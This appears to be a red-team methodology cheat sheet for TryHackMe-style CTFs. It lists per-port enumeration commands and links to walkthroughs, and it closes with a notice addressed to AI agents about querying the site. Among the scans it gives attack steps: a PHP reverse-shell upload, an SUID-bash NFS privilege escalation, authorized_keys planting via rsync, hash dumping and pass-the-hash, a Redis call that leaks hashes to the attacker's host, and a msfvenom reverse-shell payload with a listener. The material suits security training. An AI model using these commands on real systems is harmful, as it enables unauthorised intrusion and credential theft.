# Enumeration

## **Scans**

**Initial scan**

**Kali**

```
nmap -A $VICTIM
```

**Longer scan**

**Kali**

```
nmap -sV -sT -O -p 1-65535 $VICTIM
```

**Even longer scan**

**Kali**

```
nmap -sC -sV -p- $VICTIM
```

**Scan for vulnerabilities**

Change ports to the ports found from previous scans

**Kali**

```
nmap -p1,2,3,4 --script=vuln $VICTIM
```

## **Ports**

## TCP/21 - **FTP**

### **Common Credentials**

#### Usernames

```
anonymous
admin
guest
```

#### Passwords

```
anonymous
password
guest
```

### Access FTP

**Kali**

```
ftp $VICTIM 21
```

### List files

**Kali(ftp)**

```
ls
```

#### List files (using Curl)

**Kali**

```
curl ftp://anonymous:anonymous@$VICTIM:21
```

### Download  files

Change to Binary mode & passive (an important setting if you're uploading/downloading binary files like pictures and/or executables!).

**Kali(ftp)**

```
binary
passive
```

**Kali(ftp)**

```
get $fileName.txt
```

#### Download all files

**Kali(ftp)**

```
mget *
```

#### Download all files to the current directory (using Wget)

**Kali**

```
wget -m ftp://anonymous:anonymous@$VICTIM:21 -nd
```

### Upload files

If there is also a website being hosted and you can see the try adding a webshell and going to it from the browser.

**Kali(ftp)**

```
binary
passive
put php-reverse-shell.php
```

## **TCP/22 - SSH**

### SSH into host

**Kali**

```
ssh $USERNAME@$VICTIM

#SSH into non-standard port
ssh $USERNAME@$VICTIM -p2222
```

### Check this page for cracking examples

[Credential Gathering & Cracking](/red-team/methodologies-and-resources/cheat-sheets/credential-gathering-and-cracking.md#ssh)

## **TCP/25 - SMTP**

**Kali**

```
telnet $VICTIM 25
HELO
VRFY root
QUIT
```

**Kali**

```
sudo nmap $VICTIM -p25 --script smtp-commands 
```

**Kali**

```
sudo nmap $VICTIM -p25 --script smtp-enum-users --script-args smtp-enum-users.methods={VRFY,EXPN,RCPT} -
```

**Kali**

```
smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t $VICTIM
```

### Check for vulnerabilities 

**Kali**

```
sudo nmap $VICTIM -p25 --script smtp-vuln* 
```

### Check this page for cracking examples

[Credential Gathering & Cracking](/red-team/methodologies-and-resources/cheat-sheets/credential-gathering-and-cracking.md#smtp)

## **UDP/53 - DNS**

### Find subdomains

**Example**

[Enumeration](/red-team/walkthroughs/tryhackme/enumeration.md#dns-smb-and-snmp)[Hip Flask](/red-team/walkthroughs/tryhackme/hip-flask.md#udp-53-dns)

**Kali**

```
dig -t AXFR $HOST.thm @$DNSSERVER
```

##

##

## **TCP/80:443 - HTTP(s)**

### Web Enumeration

Useful info on how to run a lot of the tools in this section.

[Web Enumeration](/red-team/walkthroughs/tryhackme/web-enumeration.md)

### Info gathering info

Check if any pages are listed

```
http://$VICTIM/robots.txt
http://$VICTIM/sitemap.xml
```

Check certificate for hostname. Then add to hosts file.

**Examples**

[Spring](/red-team/walkthroughs/tryhackme/spring.md)

<figure><img src="/files/pW393ZrRzUn8lzEPxHST" alt=""><figcaption></figcaption></figure>

### Create wordlist&#x20;

Creating a wordlist from this site based off of what is on the website.

**Examples**

[Password Attacks](/red-team/walkthroughs/tryhackme/password-attacks.md)

**Kali**

```
cewl -m 8 -w $LIST.lst https://$VICTIM 
```

### Find Directories

**Kali**

```
ffuf -u http://$VICTIM/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
```

**Kali**

```
dirb http://$VICTIM/
dirb http://$VICTIM:$PORT/
dirb http://$VICTIM:80 /usr/share/wordlists/dirb/big.txt -z10 
```

### Find Pages

**Kali**

```
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
```

**Kali**

```
gobuster dir --url http://$VICTIM/ -w /usr/share/dirb/wordlists/big.txt -l
```

**Kali**

```
ffuf -u http://$VICTIM/static/FUZZ -w /usr/share/dirb/wordlists/big.txt
```

**Kali**

```
dirsearch -u $VICTIM:$PORT 
```

### Find pages with certain extensions

**Examples**

[ffuf](/red-team/walkthroughs/tryhackme/ffuf.md#find-pages-with-certain-extensions)

**Kali**

```
head /usr/share/wordlists/SecLists/Discovery/Web-Content/web-extensions.txt  
```

**web-extensions.txt**

```
.asp
.aspx
.bat
.c
.cfm
.cgi
.css
.com
.dll
.exe
```

**Kali**

```
ffuf -u http://$VICTIM/indexFUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/web-extensions.txt  
```

### Find pages and exclude certain extensions

**Example**

[ffuf](/red-team/walkthroughs/tryhackme/ffuf.md#find-pages-and-exclude-certain-extensions)

**Kali**

```
ffuf -u http://$VICTIM/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-
```

### Using filters

**Example**

[ffuf](/red-team/walkthroughs/tryhackme/ffuf.md#using-filters)

By adding `-fc 403` (filter code) we'll hide from the output all 403 HTTP status codes.

**Kali**

```
ffuf -u http://$VICTIM/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt -fc 403
```

Use `-mc 200` (match code) instead of having a long list of filtered codes.

**Kali**

```
ffuf -u http://$VICTIM/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt -mc 200
```

We can use a regexp to match all files beginning with a dot.

**Kali**

```
ffuf -u http://$VICTIM/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt -fr '/\..*'
```

### Fuzzing parameters

**Example**

[ffuf](/red-team/walkthroughs/tryhackme/ffuf.md#fuzzing-parameters)

ffuf allows you to put the keyword anywhere we can use it to fuzz for parameters.

**Kali**

```
ffuf -u http://$VICTIM/sqli-labs/Less-1/?FUZZ=1 -c -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-words-lowercase.txt -fw 39
```

### Find Vulnerabilities&#x20;

Nikto Tuning (-T) Options

```
0 – File Upload
1 – Interesting File / Seen in logs
2 – Misconfiguration / Default File
3 – Information Disclosure
4 – Injection (XSS/Script/HTML)
5 – Remote File Retrieval – Inside Web Root
6 – Denial of Service
7 – Remote File Retrieval – Server Wide
8 – Command Execution / Remote Shell
9 – SQL Injection
a – Authentication Bypass
b – Software Identification
c – Remote Source Inclusion
x – Reverse Tuning Options (i.e., include all except specified)
```

#### Scan for misconfigurations

```
nikto -h $VICTIM -T 2 -Format txt 
```

#### Scan for SQL injection vulnerabilities.

```
nikto -h $VICTIM -T 9 -Format txt 
```

#### Authenticated nikito scan

**Examples**

[ToolsRus](/red-team/walkthroughs/tryhackme/toolsrus.md)

**Kali**

```
nikto -id $USERNAME:$PASSWORD -h http://$VICTIM:80/manager/html
```

#### Check for Shellshock

```
nmap -p 80 $VICTIM --script http-shellshock 
```

#### **Check for  Heartbleed**

```
nmap -p 443  $VICTIM --script ssl-heartbleed
```

### Fuzzing Subdomains

**Example**

[CMesS](/red-team/walkthroughs/tryhackme/cmess.md#fuzzing-domains)

**Kali**

```
wfuzz -c -f sub-fighter -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u 'http://$URL.thm/' -H "Host: FUZZ.$URL.thm" > results.txt

grep -v '290 W' results.txt
```

**Example**

[VulnNet](/red-team/walkthroughs/tryhackme/vulnnet.md#fuzz-subdomain)

**Kali**

```
gobuster vhost -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://$URL.thm  
```

**Example**

[ffuf](/red-team/walkthroughs/tryhackme/ffuf.md#finding-vhosts-and-subdomains)

**Kali**

```
ffuf -u http://FUZZ.$URL.thm -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
```

### Proxifying ffuf traffic

Example

[ffuf](/red-team/walkthroughs/tryhackme/ffuf.md#proxifying-ffuf-traffic)

**Kali**

```
ffuf -u http://$VICTIM -c -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -x http://127.0.0.1:8080
```

It's also possible to send only matches to your proxy for replaying:

**Kali**

```
ffuf -u http://$VICTIM  -c -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -replay-proxy http://127.0.0.1:8080
```

### SQLMap

#### Get information

Can be used to get things like usernames and passwords or other information in the tables.

**Example**

[The Cod Caper](/red-team/walkthroughs/tryhackme/the-cod-caper.md#sql)[Expose](/red-team/walkthroughs/tryhackme/expose.md)

**Kali**

```
sqlmap -u http://$VICTIM/$PAGE.php --forms --dump
OR
sqlmap -r request.txt --dbms=mysql --dump #Get request from Burp
```

#### **Get Databases**

**Examples**

[Olympus](/red-team/walkthroughs/tryhackme/olympus.md)[Gallery](/red-team/walkthroughs/tryhackme/gallery.md)

First capture the request of the page with Burp

**Kali**

```
sudo sqlmap -r request.req --dbs
```

Get tables

**Kali**

```
sudo sqlmap -r request.req --current-db $DATABASE --tables
```

Get fields for specified table&#x20;

**Kali**

```
sudo sqlmap -r request.req --current-db $DATABASE --tables -T $TABLE --columns
```

Get values of specific fields

**Kali**

```
sudo sqlmap -r request.req --current-db $DATABASE  --tables -T $TABLE  -C $FIELD1, $FIELD2 --dump
```

#### **Rescan SQLMap**

SQLMap will just give you the same results if you keep trying the same command, even if things have changed. Remove the cache to resolve this.

**Kali**

```
rm -rf /root/.sqlmap/output/$HOST.thm/
```

## Cookies

**Example**

[Avengers Blog](/red-team/walkthroughs/tryhackme/avengers-blog.md#cookies)

Get the flag with developer console by checking the cookie.

<figure><img src="/files/Ce3JfXaZGGORRpkmi4n1" alt=""><figcaption></figcaption></figure>

## HTTP Headers

**Example**

[Avengers Blog](/red-team/walkthroughs/tryhackme/avengers-blog.md#http-headers)

<figure><img src="/files/4NJ9J2B6Q8mRS3cvVEiz" alt=""><figcaption></figcaption></figure>

### Run Web server

#### Kali

```
python2 -m SimpleHTTPServer 81
```

### Wordpress

#### Scan wordpress site

**Examples**

[Retro](/red-team/walkthroughs/tryhackme/retro.md)

#### Kali

```
HTTP
wpscan --url http://$VICTIM

HTTPS
wpscan --url http://$VICTIM --disable-tls-checks
```

#### Enumerate wordpress site

**Examples**

[Retro](/red-team/walkthroughs/tryhackme/retro.md)[Wordpress: CVE-2021-29447](/red-team/walkthroughs/tryhackme/wordpress-cve-2021-29447.md)

#### Kali

```
wpscan --url http://$VICTIM -e p,t,u
```

#### Bruteforce admin page

#### Kali

```
wpscan --url http://$VICTIM --passwords /usr/share/wordlists/rockyou.txt
```

### .git folder found

**Examples**

[Spring](/red-team/walkthroughs/tryhackme/spring.md#gitdumper)

**Kali**

```
pip install git-dumper
mkdir git
git-dumper https://$VICTIM/sources/new/.git/ git/
cd git
git log

grep -r pass *
```

## Jenkins

#### Reverse Shell

**Examples**

[Internal](/red-team/walkthroughs/tryhackme/internal.md#jenkins-web)

## UDP/88 - Kerberos

### Username Enumeration

Finds valid users

**Examples**

[Attacktive Directory](/red-team/walkthroughs/tryhackme/attacktive-directory.md)

```
kerbrute/dist/kerbrute_linux_386 userenum --dc=$VICTIM -d=$commonName $ListOfUsernames.txt
```

### Get Ticket

**Examples**

[Attacktive Directory](/red-team/walkthroughs/tryhackme/attacktive-directory.md)

The hash type is Kerberos 5 etype 23 AS-REP.

```
python3.9 /opt/impacket/examples/GetNPUsers.py -no-pass -usersfile validusers.txt -dc-ip $VICTIM $commonName
```

## **TCP/110 - POP3**

### Logging in with credentials

**Examples**

[Fowsniff CTF](/red-team/walkthroughs/tryhackme/fowsniff-ctf.md#tcp-110-pop3)

```
telnet $VICTIM 110
USER root
PASS root
RETR 1 #change number for each available message
QUIT
```

### Check this page for cracking examples

[Credential Gathering & Cracking](/red-team/methodologies-and-resources/cheat-sheets/credential-gathering-and-cracking.md#pop3)

## **TCP/135 - RPC**

**Kali**

```
rpcclient -U '' $VICTIM
srvinfo
netshareenum # print the real file-path of shares; good for accurate RCE
```

### **Login with credentials**

**Examples**

[Gatekeeper](/red-team/walkthroughs/tryhackme/gatekeeper.md)

**Kali**

```
python3.9 /opt/impacket/build/scripts-3.9/psexec.py $USER@$VICTIM
Password: $PASSWORD
```

##

## **TCP/139 - NetBIOS**

**Examples**&#x20;

[Basic Pentesting](/red-team/walkthroughs/tryhackme/basic-pentesting.md#smb-port-139)

### **Enumerate SMB**

**Kali**

```
nmap $VICTIM --script=smb-enum*
```

**Examples**&#x20;

[Gatekeeper](/red-team/walkthroughs/tryhackme/gatekeeper.md)[VulnNet: Internal](/red-team/walkthroughs/tryhackme/vulnnet-internal.md)

**Kali**

```
nbtscan $VICTIM
```

**Examples**

[Attacktive Directory](/red-team/walkthroughs/tryhackme/attacktive-directory.md)

**Kali**

```
enum4linux $VICTIM
```

## **UDP/161 - SNMP**

## **Collect Information**

**Examples**

[Enumeration](/red-team/walkthroughs/tryhackme/enumeration.md#dns-smb-and-snmp)

**Kali**

```
git clone https://gitlab.com/kalilinux/packages/snmpcheck.git
cd snmpcheck/
gem install snmp
chmod +x snmpcheck-1.9.rb
./snmpcheck-1.9.rb $VICTIM -c $COMMUNITYSTRING
```

## **TCP/389 - LDAP**

### Enumerating Active Directory

**Examples**

[Enumerating Active Directory](/red-team/walkthroughs/tryhackme/enumerating-active-directory.md)

### Breaching Active Directory

**Examples**

[Breaching Active Directory](/red-team/walkthroughs/tryhackme/breaching-active-directory.md)

### Exploiting Active Directory

**Examples**

[Exploiting Active Directory](/red-team/walkthroughs/tryhackme/exploiting-active-directory.md)

### Persisting Active Directory

**Examples**

[Persisting Active Directory](/red-team/walkthroughs/tryhackme/persisting-active-directory.md)

## **TCP/445  - SMB**

### Scanning

**Examples**

[Basic Pentesting](/red-team/walkthroughs/tryhackme/basic-pentesting.md)

**Kali**

```
nmap $VICTIM --script=smb-enum*
```

### **Common Credentials**

#### Usernames

```
anonymous
admin
guest

smbclient -L //$VICTIM/ -U $USERNAMES
```

### **List Shares**

**Option #1**

**Examples**

[Gatekeeper](/red-team/walkthroughs/tryhackme/gatekeeper.md)[Attacktive Directory](/red-team/walkthroughs/tryhackme/attacktive-directory.md)[Basic Pentesting](/red-team/walkthroughs/tryhackme/basic-pentesting.md)

**Kali**

```
smbclient -L //$VICTIM/ 

# List shares on a non-standard SMB/Samba port
smbclient -L //$VICTIM/ -p $PORT 
```

**Option #2**&#x20;

**Examples**

[Enumeration](/red-team/walkthroughs/tryhackme/enumeration.md#dns-smb-and-snmp)

**Victim**

```
net share
```

### Download files&#x20;

#### Option #1

**Kali**

```
smbclient \\\\$VICTIM\\$SHARE
prompt
mget *
```

#### Option #2

**Kali**

```
smbmap -H $VICTIM
smbmap -H $VICTIM-P $PORT
```

#### Option #3

**Kali**

```
smbget -R smb://$VICTIM/$SHARE

# List shares on a non-standard SMB/Samba port
smbget -R smb://$VICTIM:$PORT/$SHARE
```

### Upload files

#### Option #1

**Kali**

```
smbclient \\\\$VICTIM\\$SHARE
put $FILE
```

### Detect Vulnerabilities

```
# Check if vulnerable to EternalBlue
sudo nmap $VICTIM -p445 --script smb-vuln-ms17-010 
```

```
# Check if vulnerable to SambaCry
sudo nmap $VICTIM -p445 --script smb-vuln-cve-2017-7494 --script-args smb-vuln-cve-2017-7494.check-version
```

## **TCP/667 - IRC**

```
irssi -c $VICTIM -p $PORT
```

## **TCP/873 - RSYNC**

### **Check Modules**

```
sudo nmap $VICTIM -p873 --script rsync-list-modules
```

### **List files**

**Example**

[VulnNet: Internal](/red-team/walkthroughs/tryhackme/vulnnet-internal.md#tcp-873-rsync)

```
rsync --list-only rsync://$VICTIM 
rsync --list-only rsync://$USERNAME@$VICTIM/$FOLDER
Password: $PASSWORD
```

### **Transfer files**

**Example**

[VulnNet: Internal](/red-team/walkthroughs/tryhackme/vulnnet-internal.md#tcp-873-rsync)

```
rsync authorized_keys rsync://$USERNAME@$VICTIM/$FOLDER/.ssh
Password: $PASSWORD
```

## **TCP/2049 - NFS**

<pre><code><strong>sudo nmap $VICTIM -p111 --script-nfs*
</strong></code></pre>

### Mount drive

**Examples**

[VulnNet: Internal](/red-team/walkthroughs/tryhackme/vulnnet-internal.md)

```
#This will list some folders hopefully
showmount -e $VICTIM
#Make a dir
mkdir /mnt/nfs
#/opt/conf is just an example, put what came out after showmount
mount $VICTIM:/opt/conf /mnt/nfs
cd /mnt/nfs
```

**Upload ID\_RSA key to login**

```
ssh-keygen -t rsa
cp ~/.ssh/id_rsa.pub authorized_keys
rsync authorized_keys rsync://rsync-connect@$VICTIM/files/sys-internal/.ssh
Password: pass

ssh $USERNAME@$VICTIM
```

**Create mount**

```
sudo mkdir /mnt/FOO
mount -t nfs $VICTIM:$SHARE /tmp/mount/ -nolock
sudo mount //$VICTIM:/$SHARE /mnt/FOO
```

**Interesting loot to look for**

<pre><code><strong>- id_rsa from users home directories
</strong></code></pre>

**Privilege Escalation**

Example of how you can get root shell. All commands except the last one are run on our Kali machine where we can control the permissions fully. Then we just run the exploit as the normal user we already have access to.

```
#Download exploit
wget https://github.com/polo-sec/writing/raw/master/Security%20Challenge%20Walkthroughs/Networks%202/bash

mv bash /mount/point
chown root /mount/point/bash
chmod +u /mount/point/bash
chmod +d /mount/point/bash

#SSH in as victim and run the following
/mount/point/bash -p
```

## **TCP/3306 - SQL**

**examples**

[Umbrella](/red-team/walkthroughs/tryhackme/umbrella.md#tcp-3306-mysql)

```
mysql -u $USER -h $VICTIM -p'$PASSWORD'
```

**Kali(mysql)**

```
show databases;
use $DATABASE;
show tables;
select * from $TABLE;
```

## **TCP/3389 - RDP**

### **Scan**

**Kali**

```
sudo nmap $VICTIM -p3389 --script rdp-ntlm-info 
```

### **Login to host**

**Kali**

```
rdesktop -u $USERNAME $VICTIM
```

**Kali**

```
remmina
```

**Examples**

[Retro](/red-team/walkthroughs/tryhackme/retro.md)[Blaster](/red-team/walkthroughs/tryhackme/blaster.md)

**Kali**

```
xfreerdp /u:$USERNAME /p:$PASSWORD /cert:ignore /v:$VICTIM /workarea  +clipboard
```

**Kali**

```
xfreerdp +clipboard /u:"$USERNAME" /v:$VICTIM:3389 /size:1024x568 /smart-sizing:800x1200
Password: $PASSWORD 
```

## **TCP/5000 - Docker Registry**

### **Add repositories**

**Example**

[The Great Escape](/red-team/walkthroughs/tryhackme/the-great-escape.md)[Umbrella](/red-team/walkthroughs/tryhackme/umbrella.md)

**Kali**

```
subl /etc/docker/daemon.json
```

**daemon.json**

```
{
  "insecure-registries" : ["$VICTIM:5000"]
}
```

**Kali**

```
sudo systemctl stop docker
```

Wait 30 seconds

**Kali**

```
sudo systemctl start docker
```

### **List repositories**

**Example**

[The Docker Rodeo](/red-team/walkthroughs/tryhackme/the-docker-rodeo.md)[Umbrella](/red-team/walkthroughs/tryhackme/umbrella.md#tcp-5000-docker-registry)[Umbrella](/red-team/walkthroughs/tryhackme/umbrella.md)

**Kali**

```
curl -s http://$VICTIM:5000/v2/_catalog
```

### **Get tags of a repository**

**Example**

[The Docker Rodeo](/red-team/walkthroughs/tryhackme/the-docker-rodeo.md)[Umbrella](/red-team/walkthroughs/tryhackme/umbrella.md#tcp-5000-docker-registry)[Umbrella](/red-team/walkthroughs/tryhackme/umbrella.md)

**Kali**

```
curl -s http://$VICTIM:5000/v2/$REPOSITORY/tags/list
```

### **Get manifests**

**Example**

[The Docker Rodeo](/red-team/walkthroughs/tryhackme/the-docker-rodeo.md)[Umbrella](/red-team/walkthroughs/tryhackme/umbrella.md#tcp-5000-docker-registry)[Umbrella](/red-team/walkthroughs/tryhackme/umbrella.md)

Inside the manifest we can find potential credentials

**Kali**

```
curl -s http://$VICTIM:5000/v2/$REPOSITORY/manifests/latest
```

### Download the Docker image to find info

**Example**

[The Docker Rodeo](/red-team/walkthroughs/tryhackme/the-docker-rodeo.md#download-the-docker-image-we-are-going-to-decompile-using)

**Kali**

```
docker pull $VICTIM:5000/$REPOSITORY
docker images
dive $IMAGE_ID
```

### Enter image

**Example**

[The Great Escape](/red-team/walkthroughs/tryhackme/the-great-escape.md)

**Kali**

```
docker -H $VICTIM:5000 images
docker -H $VICTIM:5000 run -v /:/mnt --rm -it $REPOSITORY chroot /mnt sh
```

## Uploading Malicious Docker Images

**Example**

[The Docker Rodeo](/red-team/walkthroughs/tryhackme/the-docker-rodeo.md#vulnerability-3-uploading-malicious-docker-images)

**Kali**

```
docker pull
```

**Docker file example**

<figure><img src="/files/fqKFTst7eShqqAqgotuL" alt=""><figcaption></figcaption></figure>

## RCE via Exposed Docker Daemon

**Example**

[The Docker Rodeo](/red-team/walkthroughs/tryhackme/the-docker-rodeo.md#vulnerability-4-rce-via-exposed-docker-daemon)

## Escape via Exposed Docker Daemon

**Example**

[The Docker Rodeo](/red-team/walkthroughs/tryhackme/the-docker-rodeo.md#vulnerability-5-escape-via-exposed-docker-daemon)

## Shared Namespaces

**Example**

[The Docker Rodeo](/red-team/walkthroughs/tryhackme/the-docker-rodeo.md#vulnerability-6-shared-namespaces)

## Misconfigured Privileges

**Example**

[The Docker Rodeo](/red-team/walkthroughs/tryhackme/the-docker-rodeo.md#vulnerability-7-misconfigured-privileges-deploy-2)

## Privilege Escalation with 2 shells and host mount

**Example**

[Umbrella](/red-team/walkthroughs/tryhackme/umbrella.md#privilege-escalation-with-2-shells-and-host-mount)

If you have access as **root inside a container** that has some folder from the host mounted and you have **escaped as a non privileged user to the host** and have read access over the mounted folder. You can create a **bash suid file** in the **mounted folder** inside the **container** and **execute it from the host** to privesc.

**Victim(root)**

```
find / -name "$FILE-BOTH-USERS-CAN-ACCESS"
cd /$FOLDER
cp /bin/bash . 
chown root:root bash
chmod 4777 bash
```

**Victim(claire-r)**

```
find / -name "$FILE-BOTH-USERS-CAN-ACCESS"
cd /$FOLDER-FROM-BEFORE-MIGHT-BE-DIFF-LOCATION
./bash -p 
```

## **TCP/5327 - Postgres**

```
psql -U postgres -p 5437 -h $VICTIM # postgres:postgres
SELECT pg_ls_dir('/');
```

## **TCP/5985** - WinRM or wsman

See TCP/5986 - WinRM for WinRM information

## **TCP/**&#x35;986 **- WinRM**

### **Dump Hashes**

Dump hashes of other users if the user you have access to has the privilege's to do so. If it does we can potentially use these hashes with evil-winrm to login as these other users.

**Examples**

[Attacktive Directory](/red-team/walkthroughs/tryhackme/attacktive-directory.md)

**Kali**

```
python3 /usr/local/bin/secretsdump.py  $DOMAIN/$USER:$PASSWORD@$VICTIM > allhashes.txt
cat allhashes.txt | awk -F : '{print $1 ":" $3}' | sort | uniq
```

### Login with found username and password

**Examples**

[Windows Local Persistence](/red-team/walkthroughs/tryhackme/windows-local-persistence.md#tampering-with-unprivileged-accounts)

```
evil-winrm -u $USER -p $PASSWORD -i $VICTIM
```

### Login with found username and hash

**Examples**

[Attacktive Directory](/red-team/walkthroughs/tryhackme/attacktive-directory.md)[Windows Local Persistence](/red-team/walkthroughs/tryhackme/windows-local-persistence.md)

```
evil-winrm -i $VICTIM -u $VICTIMUSERNAME  -H $FOUNDHASH
```

## TCP/6379 - Redis

**Example**

[VulnNet: Internal](/red-team/walkthroughs/tryhackme/vulnnet-internal.md#tcp-6379-redis)

```
redis-cli -h $VICTIM -a "$PASSWORD"
$VICTIM:6379> KEYS *
$VICTIM:6379> KEYS "$VALUE"
$VICTIM:6379> GET "$VALUE"
$VICTIM:6379> LRANGE "$VALUE" 1 100
```

### **Get Users hash**

**Example**

[VulnNet: Active](/red-team/walkthroughs/tryhackme/vulnnet-active.md#tcp-139-netbios-1)

**Kali(redis-cli)**

```
config get *
```

**Kali**

```
responder -I ens5 -dvw  
```

(You can write anything in place of share, the share does not need to exist)

**Kali(redis-cli)**

```
eval "dofile('//$KALI/share')" 0
```

## TCP/7070 - AnyConnect

**Example**

[Annie](/red-team/walkthroughs/tryhackme/annie.md)

**Exploit:** <https://www.exploit-db.com/raw/49613>

For code above and just had to change the shellcode and ip variable.

**Kali**

```
msfvenom -p linux/x64/shell_reverse_tcp LHOST=$KALI LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode
```

**Kali**

```
nc -lvnp 4444
```

## TCP/11211 - Memcache&#x20;

### Dump cache

**Example**

[Wekor](/red-team/walkthroughs/tryhackme/wekor.md#tcp-11211-memcache)

**Victim**

```
cd /usr/share/memcached/scripts/  
./memcached-tool localhost:1121 dump
```

## TCP/27017 - MongoDB

**Example**

[Road](/red-team/walkthroughs/tryhackme/road.md#tcp-27017-mongo)

### Find Info in DB

**Victim**

```
mongo
```

**Victim(mongo)**

```
show dbs
use $DBSNAME
show collections
db.$FIELD.find();
exit
```

## Knock

**Example**

[The Great Escape](/red-team/walkthroughs/tryhackme/the-great-escape.md)

Usually used in CTFs. Knock on certain ports in a certain pattern to open up more ports.

**Kali**

```
git clone https://github.com/grongor/knock.git
cd knock
./knock $VICTIM 42 1337 10420 6969 63000
```

<br>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://jeffgthompsons-organization.gitbook.io/red-team/methodologies-and-resources/enumeration.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.